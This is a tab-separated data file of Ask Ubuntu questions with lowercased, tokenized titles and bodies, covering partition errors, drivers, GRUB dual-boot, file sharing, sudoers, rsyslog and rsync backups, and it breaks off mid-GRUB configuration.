229843	/dev/sda2 contains a filesystem with error after partitioning ( updated )	i just wanted to create a separate home partition on my ubuntu 12.10 system . i booted the livedvd , resized the sda2 partition ( 28gb of data resized to 30gb based on mib [ originally on a 100gb partition ] ) and made a new ext4 partition for the home folder . the drive is an ssd drive . i had changed the settings ( noatime etc . ) for ssd succesfully a week ago . on reboot i get the following error : /dev/sda2 contains a filesystem with errors inode 74669 has an invalid extent node ( blk 6881289 ) fsd / [ 953 ] terminated with status 4 i was following this howto , but i did not get to changing any of the files or configs other than those with gparted . i have a ( two-week old ) ssd samsung drive which is functioning just fine . other specs : 64bit 12.10 , i7 , 8gb ram , nvidia . update : when trying to recover the data in my encrypted home folder before a clean install i ran dmesg . the following things i do not understand , do you ? fb : conflicting fb hw usage inteldrmfb vs efi vga - removing generic driver acpi warning : 0x0000000000000460 - 0x000000000000047f systemio conflicts with region vpmio ( 20120320/utaddress-251 ) acpi ... rather than the native driver lpc_ich resource conflict ( s ) found affecting itco_wdt this message i get for about a 100 inodes : valid ecryptfs headers not found in file header region or xattr region , inode 99738 is it a problem that i resized a partition which contains an encrypted folder ? final update : the system was corrupt . it had to do with ecryptfs . see : ecryptfs : input/output error . i reinstalled .
229844	does ecryptfs support multiple users ?	i 'm new to ecryptfs and i need some clarification on how it works . suppose there are two root users usera and userb , if i mount some folder under usera : [ usera @ dev ] $ mount ecryptfs real img now i can visit the img folder to access decrypted data . my questions is : while usera is still in log in state . can userb login and access the decrypted data ? this is currently what i observed on my local machine , but i 'm not sure if it was cause by my misconfiguration . if it is the case , how can i avoid other users from accessing the decrypted data while usera is in login state ?
229849	unable to install netbeans 6.9 in ubuntu 12.04	unable to install netbeans 6.9.1 to ubuntu 12.04 root @ cybage-virtual-machine : /home/rdas/downloads # ./netbeans-6.9.1-ml-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... installer file /home/rdas/downloads/netbeans-6.9.1-ml-linux.sh seems to be corrupted
229853	what 's difference between using nvidia-current , nvidia-current-updates , 310.19.run , bumblebee and noveau ?	i use geforce 630m 2gb . i want to know which driver i should use . which one is recommended ? what 's their advantage and disadvantages ? and what 's the correct way to install those driver ? it trouble me when install one driver should remove other driver . thank you~
229856	connecting power or removing it causes ubuntu 12.10 to hang and crash	when i boot my machine on battery and later connect the power supply ubuntu just hangs and crashes and vice verse . i run jupiter 0.1.9 it never gave me any issue but yesterday i updated ubuntu there was no update for jupiter ( may have missed it ) but since then i have this issue . can someone please help ? i can provide all the logs or any outputs needed from me .
229857	setup with same mount point ( help me , please ! )	this is my situation : i want to have installed 4 operating systems , by the moment i already have 3 os installed ( windows xp , windows xp 64-bit edition and a linux distro ) . these are some features of my computer : intel core i5-2500 processor 4 gb of ram ddr3 nvidia geforce gt 630 4 gb graphics card seagate barracuda hdd sata 500 gb seagate barracuda green hdd sata 2 tb cd/dvd multifunction burner multi-card reader/writer i 'd like to install ubuntu 64-bits ( i 've seen it , tried it and i have it in a laptop as main os ) but i feel a little unsure about setting the mount point for the install . so , what would happen if i ... ? a . ) set the same mount point ( as used with the linux distro ) in different partitions of the same hdd b . ) set the same mount point in different partitions in different hdds excuse me if i gave little descriptions about the computer and the linux distro ( you may think it would be anyone , included ubuntu , with no exception ) . besides , i apologize if i was rude with the wording of the situation . any constructive review is welcome . note : i 've already made the partitions in the hdds ( carefully sized , of course ) .
229858	after installing ubuntu i ca n't boot windows 8 anymore	i just bought a new laptop ( a lenovo ideapad z500 ) and it came installed with windows 8 . i wanted to have ubuntu on it too , therefore i resized the win8 partition from the control panel and installed ubuntu on the free space i created . ubuntu works perfectly , windows does not load anymore ... i tried the recommended repair with boot-repair but it did not fix , now i get a `` windows boot loader failed to start '' on startup and then i get the grub screen . the partition summery created by boot-repair is here : http : //paste.ubuntu.com/1444837/ . how can i fix this ? thanks in advance for your help . edit : some more info after trying this for yet another . it looks like i 'm not the only one having troubles with this , it seems that the whole lenovo z series is affected by this . i tried so far : i 've followed this guide : https : //help.ubuntu.com/community/uefi i could not get the live cd to boot . tried the same with live usb , no luck . the cd is not detected as a bootable device , the pc keeps rebooting with the live usb inserted . i 've also tried this guide : http : //www.linuxbsdos.com/2012/11/05/dual-boot-windows-8-and-ubuntu-12-10-on-uefi-hardware/ no luck either , i get the win 8 boot loader but i get an error message whenever i try to launch ubuntu unless i accessed the bios and altered the boot order , in order to have ubuntu on top of the list . this way i can access ubuntu but not win 8 , unless alter the boot order again ... standard install from cd . after the installation completed i could not get win 8 to boot anymore . used boot-repair and i still had could not get win 8 to boot . still looking for an acceptable solution , thanks for your help .
229859	ca n't load sound card	i have installed ubuntu 12 and i cant see any volume control ; no audio player can detect any sound card and nothing shown on the system settings - > sound - > output tab . however , i can see my hardware by typing this command : aplay -l output : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : u0x4d90x20 [ usb device 0x4d9:0x20 ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 how can i activate sound ? edit : this info may help for the solution : lspci | grep audio 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 04:00.1 audio device : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ]
229864	do not auto connect huawei modem via usb port	my pc connect to modem via usb port . at start up , wired connection is disconnected , i see ubuntu is trying to connect but impossible . i have to unplug and then plug the usb port , and it connected . please show me how to solve this , i 'm using ubuntu 12.10
229867	system proxy configuration does not work	for some reaon i ca n't connect the internet via the school proxy . this only applies to apt-get , firefox with automatic proxy detection works just fine . i already tried setting up the proxy in /etc/apt.conf.d/01-proxy and as export in my bash.rc , but neither of them worked .
229869	increase launcher and applet spacing on the gnome classic panel	i 'm using ubuntu 12.04.1 with gnome classic . i added some launchers on the top panel , but they are placed too tightly ( also take a look at separators , they are n't really separate anything ) : can i increase the spacing between the launchers ? afaik this can be done by the editing of ~/.config/gtk-3.0/gtk.css . i 've managed to toggle bold font setting for the panel this way . but i have n't found which parameter have an influence on the launcher and applet spacing . also the size of icons seems too big for me - they occupy all place from the top to the bottom of the panel , without any border . they were smaller when i was using 10.04 . is there any way to reduce their size also ?
229870	why ca n't i get to a shared folder from windows	i want to access a folder on my new ubuntu 12.10 box from any machine on my network without the need to provide credentials . my machine name is ubuntu1 i have a 2tb disk that formatted ntfs that has media on it the mount point is mount1 i have numerous folders on the disk and i want to share each of them individually i have enabled folder1 and folder2 for sharing i have enabled shared access , allow others to create and delete files in this folder and guest access is allowed . the folder icon now has arrows so i assume all is good . from windows i can see under network ubuntu1 > folder1 ubuntu1 > folder2 when i click to open the folder from windows i get the error `` you can not access \ubuntu1\folder1 you do not have permission to access \ubuntu1\folder1 i have them both on the same workgroup . your assistance would be appreciated
229872	how do i add a network printer in ubuntu 12.04 ?	i know the name and the ip address of a network printer , but i ca n't seem to be able to search by ip address or name . ubuntu developers love to move things around to make it difficult for users , so now with ubuntu 12.04 i can only go on application - > system tools - > system settings - > printers , click on network and a list of printers appears . too bad the one i want to add is n't there . how do i do it ? here it suggests system - > administration - > printing , which simply does n't exist .
229876	how to close sftp connections made by dolphin ?	after using dolphin to connect to a ssh site , for example : sftp : //myserver.com and using my user and pass ... how can i close that connection so i can log in with another user ? it does always auto log me in with that same user thank you !
229877	make sudoers work with only certain parameter ?	i 'm trying to make my sudoers file allow a user to adjust the backlight without having to enter in the password . this is what i have : # user alias specification cmnd_alias adjbl = /usr/bin/su -c `` echo 150 > /sys/class/backlight/intel_backlight/brightness '' # for our user.. ouruser home= ( root ) nopasswd : adjbl .. but it does n't seem to be working , i still get prompted for the password when i try and run that command with sudo . apparently there is something i 'm missing here , any ideas ?
229879	how do i auto shutdown in kiosk mode instead of sleeping ?	i installed ubuntu in kiosk mode in a library and i want it to re-start between users . users always forget to shut down computer . is it possible to have the computer shut down or reboot automatically , instead of sleeping or hibernating ? thanks .
229883	will the logitech t650 rechargable wireless touchpad work with ubuntu ?	i 've searched google , but have n't found any answer to this . i 'm thinking about getting the logitech t650 wireless touchpad as a replacement for my old mouse . ( more information : http : //www.logitech.com/en-us/product/touchpad-t650 ) the device is targetted toward windows 8 . my question is , will this work under ubuntu 12.10 . and in particular , will the multitouch gestures work ?
229885	12.10 lost window maximize and minimize options , utility bar and launcher lost too	i recently installed ubuntu 12.10 on my dell inspiron 7520 . everything is good except the hyperactive fans.the graphic cards are intel and amd radeon 7730 . i am trying to get away with the fan problem buti do n't really know the terminal hence i am just trying to use the commands available on the forums.but this time i do n't know what did i do that now i do n't have the utility bar , launch bar and the basic features like the window minimize and maximize do n't work . i have this impression i may have uninstalled some drivers . but still not sure what to do . feel a need of dire help !
229886	difference left/right super button	when i press my left super key the gnome shell appears and when i press the right super key it does not . moreover pressing right super + t does open a terminal at once , but when using left super i have to press the t twice , when i press the t only once it is similar to just pressing the t without holding super left . this last point also occurs with other shortcuts that i defined ( like super+l , super+e ) , but not with super+up/down/left/right . what i want is to press either super key to get the gnome shell and to use either super key in combination with t to open a terminal immediately ( and similar with other shortcuts ) . i use ubuntu 12.04 lts and the gnome 3 shell .
229887	ubuntu live dvd spins down during boot on 2007 macbook	i 'm trying to install xubuntu 12.10 on a 2007 macbook . i have burned the .iso file on a cd correctly and it boots on my desktop , however when i try to boot it on the laptop , while it seems to boot , at some point before loading up any ubuntu graphics or kernel messages , the cd spins down and the screen is stuck displaying a blinking cursor . i tried rebooting the machine several times but it always does the same . although the drive should be worn out ( it 's a five year old laptop and most of apple stuff is not designed to be usable for that long in the end ) both the already installed xubuntu and macos can read the disk correctly . any suggestions on how i could boot it ?
229888	gnome-shell installed through updates	recently , i noticed that update manager was installing gnome-shell . to be sure that is the case , i tried logging in with the gnome option and i got to the gnome 3 window manager . trying to remove it through sudo apt-get autoremove gnome-shell does n't warn of the automatic removal of other packages , suggesting it is not a dependency issue . i do not intend to use gnome-shell . why was it installed automatically in the first place ?
229889	highest version of ubuntu for sun fire v100 ( ultrasparc-iie 648mhz )	i 'm currently running ubuntu 7.10 on a sun fire v100 ( ultrasparc-iie 648mhz ) . what is the highest version supported ? can i upgrade to that version directly from 7.10 and how ? thanks !
229890	hp mini 110 3g not working	i intstalled ubuntu 12.04 to my hp mini 110 . everything working ok except my 3g modem . i read that others had driver issues but i think i have some other problem . so after ubuntu start it 's asking my pin code but after i type my pin it 's says network disconnected when i try to connect again ( clicking to mobile network on ) it 's says again network disconnected . i think it 's not trying to connect . my pin is okay ( i have an external usb modem for testing , when i insert this sim card to this modem it 's working ! ) the type of the internal 3g modem is hp lc2010 mobile broadband . please help . thanks ! edit : finally i got the solution . do n't know that it 's a hp mini 110 only or not but when the hardware wifi button ( f12 ) is turned off it 's turning off the 3g too ! after i turned on the wifi and entered my pin it 's found the network and the connect is success !
229891	where i can find nas share drive nautilus mounted in terminal	exactly like the title , i managed to open smb nas share from nautilus and bookmark it or map it for future access . now i 'd like to access it using terminal . i tried to find it under /mnt or /media but no luck . any body knows where it mounted ?
229893	ubuntu server 12.04 upgrade php version to 5.3.19	i am working on a ubuntu 12.04 server edition as a virtual machine . basically , i want to upgrade the php version to the freshly released 5.3.19 , but obviously i have absolutely no clue on how to do it . using apt-get install php5-cli etc . did not work , since it still gets me 5.3.19 . so , after having quite a look at google.com , i could not find anything helping me out . so i went to linuxquestions.org and asked ppl there , noone answered . so here are all my hopes , please help ! ! if you have any explanations for me , please give them newbie-style . i am a newbie .
229896	invalid or damaged bootable partition	i downloaded ubuntu from the ubuntu website and copied it to a pen drive . on booting it i 'm getting an error stating invalid or damaged bootable partition . how can i resolve this problem ?
229897	suddenly can not browse certain website	i 'm running on ubuntu 12.04 . i can ping , dig and resolve any website/hostname . but if i try to browse a particular website google chrome ( and lynx , and firefox , and opera too ) runs on timeout . i can access the same website from windows and mac os , no chance to open it from ubuntu . absolutely no idea . any advice on how to debug ? ps : already tried to change dns , nothing happens .
229902	sublime text 2 file search not working ?	sublime text 2 has an extremely handy feature to press ctrl+p and be able to fuzzy search for files in a given specified directory . this worked well on windows , but on ubuntu it does n't recognise the sub directories of my /var/www/ folder , just the files , meaning i ca n't search through my development server easily . i tried starting sublime with sudo but that did n't help . any thoughts ?
229903	why could not i export variables permanently ?	in order to export variables permanently , we can write the export command in the following files : ~/.profile ~/.bash_profile /etc/profile in my case , ~/.bash_profile does not exist , and therefore i export the variable in the other two files : export country=uk the problem i have now is that the variable i defined ( country ) is still unknown for the system . i was wondering what i should do next . thanks !
229906	dash home not opening	i recently upgraded to ubuntu 12.10 . i am trying to open the dash home , but the sidebar disappears until i click out of it . the dash itself never shows up . sometimes the top of the screen fuzzes up a little bit , but still no dash home .
229909	rsyslog not rotating at fixed file size	i am trying to create a separate log file for a application in linux . so far i have created a .conf script to separate log in custom log file based on program name and it 's working correctly . but , i want to limit the size of log file at 10k and i am using $ outchannel for this purpose . the script is stored as /etc/rsyslog.d/00-abc_log.conf : $ outchannel o_abc , /var/log/abc.log , 10240 , /home/xyz/logrot if $ programname == 'abc ' then : omfile : $ o_abc and script /home/xyz/logrot contains the following : mv -f /var/log/abc.log /var/log/abc.log.1 below the 10k limit the logging is working correctly , but after log exceeds 10k size limit , file abc.log.1 does n't generated and logging in abc.log stops . if it matters , my system is xubuntu 12.04 running rsyslog-5.8.6 . thanks in advance .
229915	is it possible to install ubuntu in uefi/efi boot mode ?	i 'm going to replace my old pc , and the new motherboard wont't have a traditional bios but uses uefi boot mode . is it possible to install ubuntu 12.04 with this setup ? are there any known problems ? i found some info about it online , but i would like to be sure before actually buying the components for my new pc . ubuntu 12.04 lts 64-bit is supposed to be the release which supports uefi boot ... is that correct ? i only intend to run ubuntu 12.04 lts on this computer ; no dual-boot with other os 's .
229925	the unity launcher wo n't respond to mouse	the launcher sidebar has stopped working , although it pops out when i put the mouse on the left . it seems to be transparent . a click just affects whatever 's running underneath and the bar pops back in . i have firefox , rythymbox and transmission running . it was working a while ago when i opened them . then i tried to click on the update manager and got no response . any ideas ? thanks
229929	correct sensor location to use for temperature monitor in lxpanel ?	the temperature monitor in lxpanel ( i 'm using lubuntu 12.10 ) is automatically detecting one of my sensors but i would like to give it an alternate one . here is the output of sensors : adapter : virtual device temp1 : +26.8°c ( crit = +100.0°c ) temp2 : +0.0°c ( crit = +100.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +58.0°c ( high = +80.0°c , crit = +90.0°c ) core 2 : +55.0°c ( high = +80.0°c , crit = +90.0°c ) it looks like the temperature monitor is picking up temp1 automatically but i would like to set it to core 0 or core 2 . it has a string for `` sensor '' but i 'm not sure what that would be . i 've tried `` core 0 '' , `` coretemp-isa-0000 '' and `` /sys/devices/platform/coretemp.0/temp2_input '' but none seem to work . any thoughts ?
229933	how to add server to the list in starcraft brood war ( ubuntu , wine )	i 'm running starcraft via wine . it runs perfectly , but i do n't know how to add an entry to the list of servers . in windows it 's added via reg file .
229936	microsoft ergonomic 7000 keyboard + mouse lag	i recently bought a new microsoft ergonomic 7000 keyboard . i started to use it with my ubuntu 12.04 and it lags all the time . i try to be more specific : even on a minor cpu usage the mouse lags . by minor i mean firefox loading a webpage , or opening an application like conky , gnome-terminal etc . when higher cpu usage occurs the keyboard is lagging too , but by this i mean it misses my hits , so what i type wo n't appear later . what i tried so far ( and did not work ) ? disable autosuspend ( echo -1 to sys/bus/usb ... /autosuspend ) and at the same place set level to `` on '' . i have tried several video drivers : vesa , radeon , newest catalyst ( and catalyst beta too ) when my keyboard and/or mouse lags i tried an other usb keyboard which works perfectly and the same for the mouse . i tried the keyboard and mouse on a different computer with linux ( ubuntu , arch , opensuse ) too , the same problem appears but not on windows . i tried to replace the battery sets , and to change channel on the dongle . and also tried to use the dongle from other usb ports . on the same time i am able to use any other wireless mouse . i changed the xkbmodel to `` microsoft7000 '' but it did not solve anything . about the hardware : amd a8 3870k - > radeon hd6550d 8 gb of memory 4 gb of swap ( which is almost never used ) here are my pc 's details : lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 045e:071d microsoft corp . bus 005 device 002 : id 0461:4ea7 primax electronics , ltd lspci : 00:00.0 host bridge : advanced micro devices [ amd ] family 12h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati beavercreek [ radeon hd 6550d ] 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ide mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 13 ) 00:14.1 ide interface : advanced micro devices [ amd ] hudson ide controller 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:15.0 pci bridge : advanced micro devices [ amd ] device 43a0 00:15.1 pci bridge : advanced micro devices [ amd ] device 43a1 00:16.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:16.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) dmesg | tail -n 150 : http : //pastebin.com/sguaaiue cat /var/log/xorg.0.log : http : //pastebin.com/fny7zkn4 note : the icon7 twister evolution is the replacement mouse to use .
229937	meaning of `` ' '' ( apostrophe ) in terminal commands	for some weird reason , i tried `` ' '' as word separator in identifiers , as in : $ export foo'bar=1 > > ^c $ the result is as shown above , id est the prompt changes to `` > '' and the system obviously waits for more information on my part . as you see , i had to ctrl-c to escape . the same happens using other commands such as $ ls foo'bar $ mkdir foo'bar i 'm curious about the sense of all this , that is what special meaning `` ' '' has in terminal commands ( so special in fact that it is taken apart even inside ids ) . extra : as an aside i would also like to know the set of special or otherwise invalid characters in file and folder names , both under unix-like and windows systems ( to get the common subset of safe ones ) ( in particular , what about all non-ascii ? ) . thank you , denis
229944	how to set up an rsync backup to ubuntu securely ?	i have been following various other tutorials and blog posts on setting up a ubuntu machine as a backup `` server '' ( i 'll call it a server , but it 's just running ubuntu desktop ) that i push new files to with rsync . right now , i am able to connect to the server from my laptop using rsync and ssh with an rsa key that i created and no password prompt when my laptop is connected to my home router that the server is also connected to . i would like to be able to send files from my laptop when i am away from home . some of the tutorials i have looked at had some brief suggestions about security , but they did n't focus on them . what do i need to do to let my laptop with send files to the server without making it too easy for someone else to hack into the server ? here is what i have done so far : ran ssh-keygen and ssh-copy-id to create a key pair for my laptop and server . created a script on the server to write its public ip address to a file , encrypt the file , and upload to an ftp server i have access to ( i know i could sign up for a free dynamic dns account for this part , but since i have the ftp account and do n't really need to make the ip publicly accessible i thought this might be better ) . here are the things i have seen suggested : port forwarding : i know i need to assign the server a fixed ip address on the router and then tell the router to forward a port or ports to it . should i just use port 22 or choose a random port and use that ? turn on the firewall ( ufw ) . will this do anything , or will my router already block everything except the port i want ? run fail2ban . are all of those things worth doing ? should i do anything else ? could i set up the server to allow connections with the rsa key only ( and not with a password ) , or will fail2ban provide enough protection against malicious connection attempts ? is it possible to limit the kinds of connections the server allows ( e.g . only ssh ) ? i hope this is n't too many questions . i am pretty new to ubuntu ( but use the shell and bash scripts on osx ) . i do n't need to have the absolute most secure set up . i 'd like something that is reasonably secure without being so complicated that it could easily break in a way that would be hard for me to fix .
229956	can not install ubuntu	i 'm using windows 7 and when i try to install and this message appears : '' an error ocurred : could not retrieve the required installation files for more information , please see the log file : c : \users\ ... ... ... ... .\wubi-12.10-rev273.log '' the final part of the log - > 12-17 13:43 debug distro : checking whether f : \ is a valid ubuntu cd 12-17 13:43 debug distro : parsing info from str=ubuntu 12.10 `` quantal quetzal '' - release i386 ( 20121017.2 ) 12-17 13:43 debug distro : parsed info= { 'name ' : 'ubuntu ' , 'subversion ' : 'release ' , 'version ' : '12.10 ' , 'build ' : '20121017.2 ' , 'codename ' : 'quantal quetzal ' , 'arch ' : 'i386 ' } 12-17 13:43 info distro : found a valid cd for ubuntu : f : \ 12-17 13:43 info root : running the uninstaller ... 12-17 13:43 info commonbackend : this is the uninstaller running 12-17 13:43 debug windowsfrontend : __init__ ... 12-17 13:43 debug windowsfrontend : on_init ... 12-17 13:43 info winuipage : appname=wubi , localedir=c : \users\tasso'~1\appdata\local\temp\pyled6a.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-17 13:43 info windowsfrontend : operation cancelled 12-17 13:43 debug windowsfrontend : frontend.quit 12-17 13:43 debug windowsfrontend : frontend.on_quit 12-17 13:43 debug root : application.on_quit 12-17 13:43 info root : sys.exit
229957	firefox ignore gtk theme for localhost stuff	i know this is pretty much a duplicate of how can one make firefox ignore my gtk theme entirely ? , but the answers on that one are no permanent solution . it works by launching firefox from the terminal . i would like to know a solution that works for every instance of firefox no matter how it was created . there is the possibility to edit the usercontent.css file , but the settings you make randomly do not apply to some sites or in some situations , strangely , even with the ! important added ... i have a dark gtk theme and this results in some textboxes having a black background with black text with a usercontent.css that has input , textarea { color : black ! important ; background-color : white ! important ; } update i changed a setting in about : config from true to false , namely browser.display.use_system_colors . everything appears normal and well now , for one exception : everything that runs on localhost . this includes phpmyadmin and a website i am making . i would like to know if there is a solution to this .
229959	unity greeter login screen cuts off login options	i have a pretty newly installed ubuntu 12.04 , using unity . my external monitor is 1920x1080 max resolution . in the unity desktop itself everything looks great . i have an nvidia graphics card . when i start my computer and get to the unity greeter login screen the display is oddly formatted and the resolution seems off . it looks like a zoomed view on the larger 1920x1080 screen . as such it crops the login options off to the left hand side of the screen . so i can only just see the edge of the password box for the user i want to log in with . i can log in with one account by default by blindly typing the password , but i am unable to switch to other accounts . is there anything i can do to fix the log in screen display so that i can see the normal login options ? note : i first noticed it when i changed my desktop background and the next time i logged in i saw the issue .
229960	how to copy files while keeping directory structure ?	this is for a java project , but the same concept can be applied more generally : basically , i have a projects with all *.java files located in some sub directory of src . now i want to grab all directories with the name test in that directory tree and move them into a new directory called tests , e.g . : src- > com- > a1 - > a.java - > b.java - > test - > test1.java - > test2.java to src- > com- > a1 - > a.java - > b.java tests- > com- > a1- > test - > test1.java - > test2.java how would i best do that ?
229961	using an ipad or nexus 7 as an ubuntu second monitor	is there any way to use an ipad mini or a nexus 7 as a second monitor through a cable ? i dont want something like vnc , i need it to work through the usb cable ( or any other cable ) . i imagine that the ipad will get a lot of hate around here , the reason why i am considering it is because of the larger screen ( compared to the nexus 7 ) . i think its self explanatory that i need this to work with ubuntu ( as i am posting in this formum ) . thanks for reading this highly unorganized , typo-flled ( < -- see what i did there ? ) , un-cohesive post . any help will be appreciated !
229965	recovering grub2 without livecd	windows deleted my grub2 install so i need to reinstall it . all methods i read say `` use your livecd and run chroot '' , i can not use a livecd . i do not have my original livecd and i can not download a new image because i 'm on an unstable connection with max 100kb/s download so downloading a large file just is n't going to happen . is there anyway i can download just grub2 and install that ?
229968	encrypted lvm on multiple drives	i want to set up encrypted lvm when i install ubuntu . i have an ssd and an hdd and i would like to put /boot , swap and all the other mount points on the ssd but put /home on the hdd . i want to use the same passphrase for both drives . how can i achieve this ?
229969	share on lan in ubuntu 12.10	how to share file over lan in ubuntu 12.10 . i have shared some files , but on the other machine it keep asking for password
229970	how to add another os entry in wubi grub	i am trying to install another linux distro besides ubuntu . however , i want to retain my existing windows based loader . currently , as per my knowledge , msdos loads grub which then loads ubuntu ( with loop back trick ) . now , i have a new linux distro installed on /dev/sda8 ( /boot for new distro ) where as /root for that os is installed on /dev/sda9 . i tried following steps 1 . add entry into 40_custom of ubuntu grub 2. update grub but upon booting via that entry , it is not able to load the new os and shows me blank screen . what could be the problem ? additional data : grub.cfg file of ubuntu menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-fc296be2-8c59-4f21-a3f8-47c38cd0d537 ' { gfxmode $ linux_gfx_mode insmod gzio insmod ntfs set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 01cd7bb998db0870 else search -- no-floppy -- fs-uuid -- set=root 01cd7bb998db0870 fi loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) linux /boot/vmlinuz-3.5.0-19-generic root=uuid=01cd7bb998db0870 loop=/ubuntu/disks/root.disk ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-19-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-fc296be2-8c59-4f21-a3f8-47c38cd0d537 ' { menuentry 'ubuntu , with linux 3.5.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-19-generic-advanced-fc296be2-8c59-4f21-a3f8-47c38cd0d537 ' { gfxmode $ linux_gfx_mode insmod gzio insmod ntfs set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 01cd7bb998db0870 else search -- no-floppy -- fs-uuid -- set=root 01cd7bb998db0870 fi loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) echo 'loading linux 3.5.0-19-generic ... ' linux /boot/vmlinuz-3.5.0-19-generic root=uuid=01cd7bb998db0870 loop=/ubuntu/disks/root.disk ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-19-generic } menuentry 'ubuntu , with linux 3.5.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-19-generic-recovery-fc296be2-8c59-4f21-a3f8-47c38cd0d537 ' { insmod gzio insmod ntfs set root='hd0 , msdos5' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos5 -- hint-efi=hd0 , msdos5 -- hint-baremetal=ahci0 , msdos5 01cd7bb998db0870 else search -- no-floppy -- fs-uuid -- set=root 01cd7bb998db0870 fi loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) echo 'loading linux 3.5.0-19-generic ... ' linux /boot/vmlinuz-3.5.0-19-generic root=uuid=01cd7bb998db0870 loop=/ubuntu/disks/root.disk ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-19-generic } } # # # end /etc/grub.d/10_lupin # # # menuentry 'linux , with linux core repo kernel ' -- class arch -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-core repo kernel-true-0f490b6c-e92d-42f0-88e1-0bd3c0d27641 ' { load_video set gfxpayload=keep insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos8 -- hint-efi=hd0 , msdos8 -- hint-baremetal=ahci0 , msdos8 0f490b6c-e92d-42f0-88e1-0bd3c0d27641 else search -- no-floppy -- fs-uuid -- set=root 0f490b6c-e92d-42f0-88e1-0bd3c0d27641 fi echo 'loading linux core repo kernel ... ' linux /boot/vmlinuz-linux root=uuid=0f490b6c-e92d-42f0-88e1-0bd3c0d27641 ro quiet echo 'loading initial ramdisk ... ' initrd /boot/initramfs-linux.img } menuentry 'linux , with linux core repo kernel ( fallback initramfs ) ' -- class arch -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-core repo kernel-fallback-0f490b6c-e92d-42f0-88e1-0bd3c0d27641 ' { load_video set gfxpayload=keep insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos8' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos8 -- hint-efi=hd0 , msdos8 -- hint-baremetal=ahci0 , msdos8 0f490b6c-e92d-42f0-88e1-0bd3c0d27641 else search -- no-floppy -- fs-uuid -- set=root 0f490b6c-e92d-42f0-88e1-0bd3c0d27641 fi echo 'loading linux core repo 